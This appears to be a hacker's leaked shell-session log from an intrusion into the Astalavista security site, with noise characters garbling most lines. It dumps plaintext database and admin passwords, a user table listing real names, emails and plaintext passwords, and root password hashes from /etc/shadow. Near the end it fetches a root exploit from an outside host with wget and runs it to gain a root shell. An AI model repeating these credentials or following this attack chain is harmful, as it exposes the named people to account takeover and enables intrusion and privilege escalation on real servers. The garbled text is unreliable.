drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007* ^( k0 K+ `. k
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
4 L' X/ l) u2 h! F! Cdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
* {* k: A9 J2 ?& K% sdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend2 d7 G' ~# W; B
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner: z7 T: t3 o: P, l" ~' b6 F
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg$ t' ]+ M8 T2 z6 e: ^; P0 U
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config7 R- ]+ o. ~" F8 o- V0 o
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron8 @/ o5 s# Q: z: l
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
+ t. P4 _( Y; ], a' z7 K9 T" C+ B-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
6 G$ Z- l+ k, t0 a. r7 m-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico- R5 ?- c( ]$ ]4 @- r9 c. W
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed( i: B' ~- F9 s* q
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
2 O, b: k8 t* I' m, S" S-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess) i! x, F% t1 z1 D# W
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess: H; ?5 C8 F# N% f
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php. H* a7 S1 W+ f5 G
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
1 I0 e6 I" E7 h. f-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
. l1 D; O% X( |9 s% k ?-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php; ?0 A* ^# W' _4 s$ Z
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
4 g$ H8 w0 a; X" D% |9 Qdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
" h$ d! t3 n/ T# o. Idrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
$ c. M( K8 x+ `, V- J! u( Cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib9 p7 n& j' \% B$ j4 V2 i. T* ]
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log* |; T; H' f9 |8 U6 A& t
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member f( h$ E" C6 \# L
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
6 z% W* I9 x0 ~( T& _# D5 h4 Cdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new; `5 K3 G U1 X, F4 @
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf% ?- j, Q$ V* B; M- G w- W8 _5 A/ j
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re4 v1 O/ ]% d) d3 i, B6 S" E, P: O
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
$ k' x+ M6 h0 hdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss' Q/ ` g; e U; }$ l
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
+ o7 I: L9 X- e) q% B9 s9 I* bdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
7 s' `0 ]( |6 W& I) _drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes) r# e4 c9 j6 I+ E6 J: x
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
4 i, A1 H" [; `( A. Qdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
' u6 d+ T2 \" Q& N$ m) E+ Gdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
3 c0 J+ T6 \) h0 T( ndrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
, _% X1 W- w% |7 ]- S2 y1 m k-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php5 e; O3 K0 v0 d$ s z
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki* m! U" a. F5 ]0 Q
5 O8 m; q( {1 K9 i1 r
sh-3.2$ head -20 index.php$ ^8 h/ W5 M& M* y u& i' }
<?PHP8 g+ ?/ x0 f F5 b
/**3 ]' J$ E: {% ?4 m9 z/ y
* Mainfile (external) for astalavistaNET v2.0
$ e) ` n2 F: N# p$ w' v& \9 K*
6 e% V- l5 l1 }* @copyright Astalavista IT Engineering GmbH, R: b) V/ @8 I! |9 u
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
, f2 b# t+ U- b/ M$ U: A* @version 1.0- Z$ f: N9 C# o
*/
6 n. l! v" {2 M' t* n1 C5 s0 |2 e3 V+ U$ @
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
+ g0 l6 B5 A4 K& n; t $dontStartSession = false;& R9 z. X& s2 X. z0 o( t
} else {
8 S9 m; }1 S+ G0 W $dontStartSession = true;
3 \7 D' Z$ N/ v; M0 t% B }5 y1 }' r. ` B1 w
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
+ a: \$ a7 c; O3 Q require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);- P v3 f6 z! b o! U0 D5 B, T
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);$ c2 V, ^8 j7 p3 p
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);* ?5 ?, Y$ p/ s/ V
" Z$ l. @" g2 N% ?sh-3.2$ cd config5 a' t7 l- I8 z+ h3 k- ^
sh-3.2$ ls -la
) O3 e; g8 P7 k4 Etotal 32
& o+ t8 V# M5 Vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
9 j8 L4 t: Y# I( p% Jdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
% R' s6 E% T, m/ x-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php- A% |. v9 ^* H$ i8 y9 X+ R
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php# _9 [( y& d% C* X
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php( q$ V7 I- e3 I! f" |9 H
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php4 x2 R. t6 x2 f' y, n3 D' U
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
( S$ t2 N5 [* s; r7 U" U2 R8 L" d3 X. l) k9 ^8 @
sh-3.2$ cat com.conf.php
* D! X k8 j9 k. q) Y6 {! i8 O$ y[snip]
# Y' O$ U; w% c' f( ?! ?0 @5 X//member-database
3 Z! ^6 m* H8 n2 W7 R7 d% L$_CONFIG['db_mem_server'] = ‘localhost’;2 r: s3 L2 Z$ X! M
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
/ u( S9 F7 N: Z5 R) a# N$_CONFIG['db_mem_user'] = ‘astanet_db’;
/ w$ r0 e9 X: H+ ~2 @$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;7 k1 O a3 f! ?
$_CONFIG['db_mem_debug'] = false; //true or false+ Y8 Y; M4 v* I( l! C9 H5 d
//ads-database
- a3 A4 q! s+ U: C( P5 O6 [* M3 L W$_CONFIG['db_ads_server'] = ‘localhost’;" z4 W8 p; [+ P$ z0 ~4 q
$_CONFIG['db_ads_database'] = ‘astanet_ads’;& V2 f! B5 T5 D6 j7 @
$_CONFIG['db_ads_user'] = ‘astanet_db’;
" V6 \& G8 ]" ]% z9 A+ Y! a- a$ N$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
7 T$ s1 v# l. H4 Z; g, K% I4 t1 u: W$_CONFIG['db_ads_debug'] = false; //true or false
0 k# h8 H! b) s+ T. {) n//rainbow-database
* ]/ v/ r5 T2 }6 `6 C+ S# f; R2 A/ V$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
6 m8 @6 D, w% \& h; H, N$ N$_CONFIG['db_rainbow_database'] = ‘rainbow’;
: Q" `9 }: m1 u! D" p$_CONFIG['db_rainbow_user'] = ‘dinu’;
0 k, h5 j/ H# k9 ?- F/ r! d2 S$_CONFIG['db_rainbow_password'] = ‘dinudinu’;! u/ E. M$ X' s$ Z2 T0 E8 n
$_CONFIG['db_rainbow_debug'] = false; //true or false
" K7 [- A8 p9 k$ c; ?//mailing lists database6 L- v; m5 W% G$ Z' b) q9 [
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;2 E7 A E' s3 ] H8 Y1 _/ ]
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
; s. l4 z+ o+ E9 L$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;4 n, m1 o2 t' u4 D4 y1 y+ r
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
: @. f( y" U* ?$_CONFIG['db_mailing_lists_debug'] = false; //true or false# I. k4 S* s! v% |: b; A
//paypal2 ?* L6 L7 g8 S
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;' V0 @9 g1 b$ c' Q3 I5 z
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;) o% n3 [5 f8 f3 w8 B- y
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
- T- d; c0 P9 i8 q. O4 [4 M$_CONFIG['sub_pp_noship'] = ‘1′;
% X$ [1 T6 c$ M$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;3 f$ W! [9 |. X1 D$ {2 Y0 `- ]
[snip]4 {( p. U+ m+ Q) ?( l$ M8 q
3 W4 `# ]0 h8 f% s$ y
sh-3.2$ cd ..
5 X; o/ ?; U* P% Q) lsh-3.2$ cd member! N$ u% w/ n0 Y* G# ^
sh-3.2$ ls -la& g5 ]; @& y( D* v; q% k: p* d0 Q
total 20
$ t% b) j) Y: \! Z! B& G4 adrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
_# A2 E6 O( j# {: _: Y# i; gdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, d! I* ?% z; {-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
+ t- o$ [; x2 {2 |2 Z-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php! {4 i2 c, y: V
sh-3.2$ cat .htaccess
( C# ?' \' s hSecFilterEngine off
8 b5 |% `% y4 {/ f" n7 l
( a6 x" R5 S2 d( ^" m8 x5 zsh-3.2$ cd ..
/ J, O7 L+ W. [5 p: B( Msh-3.2$ cd cron6 N" _ l" q2 J E7 q% I/ o& k
sh-3.2$ ls -la9 @7 N+ y5 u4 b$ v# K
total 168% F5 t& S: K) c" p! }% ]/ J% [3 U
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
9 D* N; k* Z+ J, j% P4 Cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
* g5 p( z x1 J4 |-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
9 V1 x. b( m- S" i4 C-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
" e" @5 v; K! e: A: }' D-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php# G0 j1 z+ S3 q% b! H
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
* `/ J% y1 T, W& Q1 i-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php$ v2 {! N9 }) e: ^
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php% g& D1 C) k8 Y- }0 R( y+ s- v: b
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
0 c& Z0 N! T% R0 E. @( Z9 ~8 T) U5 ]-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php% H5 T6 m! c+ h2 x
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh( A( O+ [6 }6 T! j
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
0 r, `7 B. {, o" F-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php. C' }# M: c$ j! t# o
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php% R- \8 r0 Y2 {6 z2 L, [
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh6 a6 E% K7 g/ Z# w
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php% T. G% Q2 G; I7 X5 h5 T9 L
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php& o9 B' ^- a% o; k' ^. E, T' N
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php$ j1 T6 L- U0 X% S
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php, I) X6 N5 G9 W
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php2 V6 f1 i$ } ~* \: `! n5 D7 N
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email0 @' S- Y( G$ v1 m; F
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php. S5 V4 S6 s: h1 S) F. f6 @
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
. p' n, Q- j% _. }5 u) Z7 w7 M, u
& i# ?9 C6 A6 \: Z# f/ k8 Ash-3.2$ cd ..
( Z( Q' F; z7 g/ G L' ]; d( Rsh-3.2$ cd _007. X! d6 } Z* Z. T0 X' Z
sh-3.2$ ls -la% v' F' O9 v$ d
total 24
1 n$ R% |1 Z kdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .! y3 c5 i/ ?- y5 J+ g" j+ W \
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ [/ W0 N* `( ~
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
+ n: b+ z# j% w3 C5 H% B-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
$ O( N/ l( D- ?. D2 q" c& t0 d7 H-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
+ [! U1 W1 x- W7 m1 V9 c5 tdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
: `; K5 y# l: S: T4 Y
" x. F7 Q3 B% o2 [4 _2 J$ psh-3.2$ cat .htaccess+ O3 z0 }& n: C+ i- ]4 I
authType Basic+ }" o& g/ H" }* e$ W+ S# c* H& M
authName Admin
. d) A% U$ C3 \, ZauthUserFile /home/astanet/auth/.htadm_pwd' e- o9 u4 }; k% x: `2 i4 E
require valid-user" ]! t+ _( O2 j8 z3 T+ G
& O4 r8 `' [7 u" C. psh-3.2$ cat /home/astanet/auth/.htadm_pwd) P6 Q8 n0 n5 w, `2 J
admin2net:CR0bl65MwhfT
3 j' k2 N @. N! x$ Y; r8 z2 T& o
6 }" j- G" V2 I) ysh-3.2$ mysql -u astanet_db -p
( P5 l* y. X4 B9 O o4 XEnter password:# Z+ q* E# [6 b6 p$ p& D
Welcome to the MySQL monitor. Commands end with ; or \g.
) H, G, I5 P2 K0 ^Your MySQL connection id is 275153
) [ ?, f/ ^9 {# c5 RServer version: 5.0.45-community-log MySQL Community Edition (GPL)
- }+ l7 g8 I: S# O I( C, s4 g2 Q1 P% j' x, ]$ G4 I: h( r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. B0 N+ T2 G+ q2 x; G& p
W9 V9 H4 t) |9 cmysql> show databases;
2 o/ s# m, u8 z! ]. K: e+———————–+
0 `! Y: ?2 B4 u3 r6 d3 n| Database |
5 d4 x Q+ @4 @" i. H+———————–+/ t1 y. u _# ~% H
| information_schema |
, W5 L y `/ `+ _* U0 p, s, Z| astanet_ads | j' q& Y$ Z" ^( J
| astanet_mailing_lists |
4 H W( a# [8 c& a" V, F- E| astanet_mediawiki |' \, u8 h3 Q- w. n/ ?5 W
| astanet_membersystem |
. f1 \$ B9 C# @| test |' ~) q# u9 W7 \4 i
+———————–+
' Y) X1 W3 H/ j$ ^& U$ a5 G% e3 R* Y6 rows in set (0.00 sec)* o, r9 N; q" c; U: |
" b% T& ^' H( J3 Y/ S6 w' G- ~
mysql> use astanet_membersystem
1 Q; B* T9 v0 o" U6 ~; KDatabase changed
- c: }* W) h+ hmysql> show tables; Z' [0 y% J5 X* Q" [' |
+———————————–+
2 F2 Q" U- z( Z' y; N' [! g| Tables_in_astanet_membersystem |: T5 Q( a4 f! F4 i. K/ m
+———————————–+
5 j+ ]! \+ \9 H& u| blacklist_categories |
* X; h, @. V4 n! E7 v$ L, {5 i| blacklist_content |
. A R$ U7 Q9 q) s7 ~| blacklist_levels |
9 a5 t+ p4 Y$ ^' || blacklist_mcset |& i( g/ K) u$ E& o: C. Z' {& E3 G
| dir_categories |
9 y% q0 D- C$ u: C: Q6 J& j/ Z4 i: h| dir_comments |
& Y. P0 Y, W; K* `' U| dir_links |" N& G7 r5 |, }, G) e/ \) q
| dir_temp | Z6 V7 n7 N( G2 G8 z
| dir_votes |5 b& W+ u L3 ]: r9 T" d
| documents |
( z+ U8 b( O* M2 G) b/ i5 y| documents_categories |8 l0 N5 g% {/ \/ b
| email_content |# O7 l; h2 ?0 D/ G
| email_settings |
$ C( J6 z/ V1 D% w| exploits |
& k+ K, t9 K" W; a: l' B. `4 r* [" p| exploits_categories |5 l) e: o G J* G, `
| exploittree_categories |
8 f; p- d- X6 M4 c' J| exploittree_exploits |% E# [: Q( R. e
| home_values |
: }# j. z! f% U' }| iso_countries |
6 m+ k2 ?& [& A [) T5 P| links_categories |: T( i: c9 v- t: b- O0 X
| links_records |
, t! M0 x& F& J; v) V, @| links_unauth |
) [$ s/ }3 e1 R- @! I| links_votes |0 A0 a0 D7 e9 J+ t8 H
| log |
8 J& j. g3 ]. u, ~- o' H4 Q8 k| news_categories |) s* C- M: L3 R6 M& P: H7 r' N
| news_comments |
; D% p: v8 k9 v% f9 w% @" b| news_emoticons |$ o, ^1 B& I( s, J8 g. \
| news_latest |0 K% b+ s: G! D0 A+ s9 I/ Q! u5 J
| news_messages |
4 z u5 M) c% f# U, W; d5 }| news_statistics |6 l7 j: \ v+ U+ _) o1 ~ [& o+ F
| news_votes |
: A9 `1 w8 C5 f8 O1 `5 F( w| prices_content |* [, t( k% Q* J" q/ A$ c, [
| prices_offers |
: R7 h& j) P: C| rss_settings |
/ Z6 `4 s' F) C# O) D| sessions |3 f0 Z, `) }- w$ |; T2 M- _ W
| stats_signups |6 f# g# \/ @; u9 l( i+ T! e
| u2u2 |
/ a+ {5 g) ]1 g! E# A2 z. @- Y/ V' O| u2u_contact |5 c% F2 |" [; _
| u2u_settings |
% l# o( F4 w1 S7 X- }; K2 b4 u; \| user_keywords_selected_categories |" f. O+ C! H( l( W% H! w2 |
| users |8 h2 c! c, o1 S6 Y* ^5 q2 R
| users_ipn_test |9 C, _5 a0 p) ^1 e4 @
| users_keyword_values |2 m- D8 l. X; g
| users_profile |
$ Z0 C) e' y$ e( e% A| users_temp |2 h. i' }& K# [/ X/ @8 I5 S* X
| users_upgrade |
S( i8 L) O a" r l4 E+———————————–+
; x, f" Q s5 |! f; x' T46 rows in set (0.00 sec), ^* @# P+ J2 l; w$ M; U4 ]
. H# S5 s9 g1 p
mysql> describe users;1 H+ ]/ t% _2 T3 Z0 s; ~3 o( Y, r' z
+————————–+————————————–+——+—–+———————+—————-+
. o- c) z G" m! k| Field | Type | Null | Key | Default | Extra |
- C9 l% C# z$ F; { I+————————–+————————————–+——+—–+———————+—————-+
8 {) f" d; |# |) w$ X( t| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
X* b6 r2 U" }+ J| user | varchar(50) | NO | | | |* h8 r) E, e. ^" G2 P/ A* Y( o: m4 y
| nickname | varchar(30) | NO | MUL | anonymous | |
/ L- z# U' P; T+ l| password | varchar(30) | NO | | | |
% K6 H9 B- h& H3 e# E| userlevel | tinyint(3) | YES | MUL | NULL | |! u$ x7 V" U# ^* ?3 s' j3 v/ C, n
| exp | int(8) unsigned | NO | | 0 | |
% m- X+ r* a# G1 u| email | varchar(50) | NO | | | |/ ~% R1 e2 \( P: V; Z
| ip | varchar(15) | NO | | 0 | |
* j- v7 K! j7 ^- N| proxy | set(’0′,’1′) | NO | | 0 | |
+ ^- u- D' x: k& X# n6 \% R| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |0 ^+ E, f8 ]1 j# o. `4 n+ F
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
) b$ @# P$ P7 Q| anz_in | tinyint(1) | NO | | -1 | |! d! F$ L8 n5 i7 F0 i
| status | tinyint(1) unsigned | NO | | 0 | |, T+ t4 l5 L2 u' J4 e& a, \7 R
| checked | set(’0′,’1′,’2′) | NO | | 0 | |" C/ x6 D/ e1 q% [8 I
| freemember | set(’0′,’1′) | NO | | 0 | |
7 ^: X3 N& z; O( `# _| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |+ ]3 }" `. [) @$ e" y' u
| lang | tinytext | NO | | | |, w* X0 E$ W( Q1 O+ t( T( ?/ v
| adid | smallint(6) | NO | | 0 | |
3 l; S0 i3 ]" {| pp_txn_id | varchar(255) | YES | | NULL | |
# E8 u+ b, R( \% n* A. v* S| cnb_transaction_id | varchar(255) | YES | | NULL | |
4 s" T0 w% a- @& E| cnb_order_id | varchar(255) | YES | | NULL | |
x9 `9 j4 K3 W| cnb_user_id | int(11) | YES | | 0 | |, s( G/ o, \- f& E, Z& ^
+————————–+————————————–+——+—–+———————+—————-+. b! @, L3 v5 g, M! G
22 rows in set (0.01 sec)
1 O* p+ x& c$ \2 W. Y
& _8 P3 H. o$ ]* f, ^2 Umysql> select count(*) as skids from users;
( r- w8 U' e9 `( ]/ v+——-+
1 A: e2 D) l6 `# @| skids |. p6 y7 ~& e4 d0 d1 P
+——-+
* u3 r% R+ o8 E+ p) \+ j| 25199 |, k4 v5 O+ }" {& N# T
+——-+
% P' ?3 C& B2 J" g; N- a1 row in set (0.00 sec)
; [; R+ s5 d/ Z; D% c
6 o0 m( Y. l6 Y4 l$ ~. p" `8 wmysql> select user,nickname,password,email from users where userlevel = 1;
3 F# n2 n. @/ y) W) W+————————–+———————-+——————+———————————–+$ g5 t5 I8 I. y; {8 i
| user | nickname | password | email |
( e. d) R( B0 d. B+————————–+———————-+——————+———————————–+
# e7 y- ?# v- q- d1 s- x| pascal | prozac | astaman3 | 链接标记info@astalavista.net |% C. @2 Q/ g/ K+ a6 @8 w
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
( l/ V1 v0 H% Z( m/ h+ u' ^| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
8 U' e- b0 l* K1 q9 F| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
0 J$ Q" `- a/ p! B( c/ r$ R1 F( B| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |, }* U4 f3 v4 v% \0 G
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |8 P: j1 ]& x L1 B
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
/ h, C+ P5 @" M% f7 D' V5 R; s) D| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
% f8 u8 w$ X4 w! F# o0 }| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |, b d6 }0 i/ z V$ g' x! z( u
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
2 \$ ^4 k+ O6 m! @7 h/ A| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |2 y- {. X0 [ i9 E
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |+ B$ S- ]7 x' v" f3 a5 k& `% Z
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
( S- w, z( F+ k7 |' ]| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
& W) d2 v2 e, {& r T| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
% ~7 ?- N, O2 s| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
4 t' z- B# }) W| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |3 O1 }7 J( ], L. Q3 v$ P6 T
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
; W, s0 I% m S) K| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
- i* s: z5 O% o, w+ |# L2 @- C| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |+ A. ^& @6 J$ Z3 s- N
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
/ @% n8 Q2 `# s7 q( Q' e; x| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
$ I# v7 v4 Z: Y6 S) X| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |. N8 r2 h* b- N: a3 l" j3 Q& ^
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
9 h5 z1 q' N# {. n9 E, b- {| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |8 ^% g a; [% ~3 X
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
0 Z: `3 Y; I1 R( v! @2 ^ O' R| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
0 e! U5 S& X( O* V. [; O+ _" E8 m+————————–+———————-+——————+———————————–+- K. S4 W! I" B" t) p9 `5 T
27 rows in set (0.00 sec)$ ]) ^: G6 R, @
/ v' T# n1 P+ A4 f+ Pmysql> exit;1 q1 x) V9 Z8 }' N: `& }2 d
Bye+ F4 ~7 y; s; F9 X; A
- S1 V( ?( s* h7 f% a[~] plaintext passwords? yes,: H$ u" m: T( ~: V
Those so called “security professionals” who charge you $6.66 / month to
/ @4 l. @: t" q& `register at their hack-proof portal, save your passwords in plaintext…
8 |: p. b3 H# T2 Y9 lbrilliant!
8 @8 }6 m9 |. {0 X7 e$ f" }" o7 p9 S$ ^% ?# X
[~] This been fun but we want more.! [+ Q$ p. _7 b6 H2 D9 J/ A3 x' {. Y
: S2 q( ]2 ?- s
sh-3.2$ uname -a+ c7 y7 }- R) y
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 U; A B. j5 ^- l+ `8 `- Msh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
8 `$ V% ]9 @% |, W–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]. x1 E+ Z" m1 Q6 S
Resolving anti.sec.labs… 13.33.33.37
9 X0 C8 s2 n% }# u: DConnecting to anti.sec.labs|13.33.33.37|:80… connected.
( N# W0 L) q& M; R. O$ ~HTTP request sent, awaiting response… 200 OK, A" u* e# C* v# Z: A# A! `2 b
Length: 18200 (18K) [text/plain]
2 b/ v3 d: R; @* G, P4 u$ u) YSaving to: `g0troot’
0 M2 M( G" l; ?) h$ N% Y4 ~
+ v* o: f9 L6 l1 ~. q& `9 s100%[=========================================================================================================================================>] 18,200 58.6K/s in3 v: R, I. A7 N$ \8 j& ~
0.3s
! P6 ~8 I# ]9 A3 ^$ Z! c- K$ l/ p7 m. r: p6 Q, {& r0 W G. O/ q6 ]9 K
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]* b6 E2 L& M/ D/ D/ V8 U/ [ x
/ ?" @$ q s5 K8 m
sh-3.2$ ./g0troot -i x86_64
1 d; l+ V6 F: Z1 T[+] g0troot - anti.sec.labs
& D! }9 y. s' {+ d" z0 l8 x; x[+] Target: 2.6.18-128.1.10.el5% i# E# } y9 a
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
6 A0 V: h4 L6 M2 e/ ~2 }5 A8 N3 C. R }$ p: f
[+] r00tr00t
& n' ]" w% L# w0 [" t0 o[~] Executing shell…, P0 J2 ]$ t, u8 k
& d0 j9 o# s* D4 @
sh-3.2# id X+ f( u' Q6 U& m
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel). m$ I, ]2 ?& p1 e, l
6 [% p' c; S) k7 o# f* F
sh-3.2# cat /etc/shadow
$ D7 D2 M: \* rroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::, I7 K0 Q& @, i9 A% z j
[snip]- T, N* F. u7 O! i8 t6 G' X- N
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
, G- `: K) i) @- w. wjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
. `+ V/ B* b$ B1 E: _com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! Z' ~! @" V, ^4 i+ p. Y
